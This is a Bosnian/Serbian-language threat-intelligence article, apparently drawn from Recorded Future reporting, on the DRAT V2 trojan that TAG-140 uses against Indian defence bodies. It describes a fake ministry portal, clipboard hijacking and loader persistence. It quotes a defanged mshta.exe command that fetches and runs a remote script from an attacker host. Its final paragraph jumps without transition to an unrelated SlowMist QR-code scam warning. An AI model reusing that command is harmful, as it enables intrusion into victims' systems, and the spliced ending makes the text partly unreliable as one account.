Pojavila se nova verzija zlonamjernog softvera DRAT V2, koja predstavlja značajno unapređenje u arsenalu državno usmjerenih aktera prijetnji koji ciljaju kritičnu infrastrukturu. Ova najnovija iteracija označava strateški prelazak sa prethodne verzije napisane u .NET-u na varijantu kompajliranu u Delphiju, čime se proširuju mogućnosti komandovanja i upravljanja (C2) koje predstavljaju povećani rizik za vladine i odbrambene organizacije širom Indijskog potkontinenta.
Kampanju ovog zlonamjernog softvera orkestrira grupa prijetnji TAG-140, poznata po poveznicama sa SideCopy-jem i širim ekosistemom Transparent Tribe. Grupa je pokazala zavidnu sofisticiranost u metodologiji ciljanja, koristeći složenu šemu socijalnog inženjeringa. Kreirali su lažnu web stranicu koja imitira zvanični portal za saopštenja za javnost indijskog Ministarstva odbrane, koristeći domenu email.gov.in.drdosurvey.info kako bi što vjernije oponašali legitimnu vladinu web stranicu mod.gov.in.
Analitičari iz Recorded Future-a otkrili su ovu zlonamjernu infrastrukturu tokom istrage nedavnih aktivnosti TAG-140, razotkrivši pedantno osmišljen lanac napada koji koristi taktike socijalnog inženjeringa slične ClickFixu. Kampanja je specifično ciljala indijske odbrambene organizacije putem ciljanih operacija “spearphishing”-a. Žrtve su upućivane na klonirani portal, gdje je samo jedan link za saopštenja za javnost iz marta 2025. godine bio aktivan, služeći kao primarni vektor infekcije.
Tehničke implikacije uvođenja DRAT V2 nadilaze konvencionalne mogućnosti daljinskog pristupa. Zlonamjerni softver uvodi novu komandu, `exec_this_comm`, koja omogućava izvršavanje proizvoljnih komandi ljuske na kompromitovanim sistemima. Ovo unapređenje značajno povećava fleksibilnost aktera prijetnji nakon eksploatacije, omogućavajući interaktivne operacije u realnom vremenu i sofisticirano lateralno kretanje unutar ciljanih mreža. Prilagođeni C2 protokol zasnovan na TCP-u, koji inicira server, ažuriran je da podržava ulazne podatke u ASCII i Unicode formatima, dok odgovori ostaju samo u ASCII formatu, demonstrirajući promišljenu ravnotežu između funkcionalnosti i operativne sigurnosti.
Pojavljivanje DRAT V2 signalizira zabrinjavajuću evoluciju operativnih sposobnosti TAG-140, posebno s obzirom na istorijski obrazac grupe u brzom rotiranju između različitih trojanaca za daljinski pristup, uključujući CurlBack, SparkRAT, AresRAT i druge. Ova strategija diverzifikacije otežava napore na detekciji, istovremeno održavajući uporan pristup visoko-vrijednim metama u indijskim vladinim i odbrambenim sektorima.
Mehanizam infekcije i dostava tereta u DRAT V2 lancu infekcije predstavlja primjer modernih tehnika distribucije zlonamjernog softvera kroz sofisticirani proces raspoređivanja u više faza. Niz napada počinje kada žrtve pristupe zlonamjernom portalu i kliknu na aktivni link za mart 2025. Taj klik preusmjerava korisnike na specijalizirani URI `/captcha/windows.php`, koji prikazuje lažno upozorenje pod naslovom “Disclosure – For Official Use Only (FOUO)”.
Nakon klika na “continue”, zlonamjerni JavaScript pokreće operaciju otmice međuspremnika (clipboard hijacking). Ova operacija kopira pažljivo kreiranu komandu u međuspremnik korisnika, a zatim ga upućuje da tu komandu zalijepi i izvrši u komandnoj ljusci. Komanda koristi izvorni Windows uslužni program `mshta.exe` kako bi preuzela i izvršila udaljeni skript sa TAG-140 infrastrukture na adresi `trade4wealth.in`. Struktura komande izgleda ovako: `C:\Windows\System32\mshta.exe hxxps://trade4wealth[.]in/admin/assets/css/default/index.php`.
Ovo izvršavanje pokreće raspoređivanje “BroaderAspect” loader-a, koji služi kao primarni mehanizam za postavljanje i instalaciju DRAT V2. Loader obavlja više ključnih funkcija, uključujući preuzimanje lažnog PDF dokumenta kako bi se održala iluzija legitimnih aktivnosti, uspostavljanje postojanosti kroz manipulaciju registratorom (registry manipulation) i na kraju preuzimanje kompresovanog DRAT V2 tereta sa infrastrukture aktera prijetnje. Mehanizam postojanosti koristi unos u registratoru unutar lokacije za automatsko pokretanje definisane od strane Microsofta. Ovo osigurava da zlonamjerni softver zadrži pristup nakon ponovnog pokretanja sistema, maskirajući se kao legitimna sistemska datoteka kroz pažljivo odabrane konvencije imenovanja i postavljanje datoteka u strukturu direktorija C:\Users\Public.
Na mreži X i zvaničnom blogu kompanije SlowMist, sigurna firma je izdala upozorenje o porastu prevara povezanih sa lažnim QR kodovima. Ova prevarantska taktika uključuje lijepljenje naljepnica sa kompromitovanim QR kodovima preko pravih kodova na javnim mjestima, kao i u okviru kripto zajednica. Cilj prevaranata je da navedu korisnike da skeniraju manipulirane kodove, što onda može dovesti do preusmjeravanja na zlonamjerne web stranice, krađe ličnih podataka ili finansijskih sredstava. U suštini, žrtve se mame naizgled bezopasnim radnjama poput skeniranja QR koda za dobijanje popusta, informacija ili pristupa ekskluzivnom sadržaju. Međutim, umjesto očekivanog ishoda, korisnici bivaju preusmjereni na lažne stranice koje su dizajnirane da ukradu njihove lozinke, ključeve novčanika ili druge osjetljive informacije. Prevara je uvjerljiva jer se QR kodovi često nalijepe preko originalnih na uobičajenim mjestima, poput izbornika u restoranima ili oglasa, stvarajući privid legitimnosti. Na primjer, u jednom konkretnom slučaju, zabilježeno je da su prevaranti postavili naljepnice sa zlonamjernim QR kodovima preko legitimnih kodova na izložbama kriptovaluta, navodeći posjetioce da misle da će dobiti nagradu ili airdrop. Kada bi korisnici skenirali te kodove, bili bi odvedeni na lažnu stranicu za prijavu koja je identična legitimnoj platformi, čime bi se odali povjerljivi podaci.
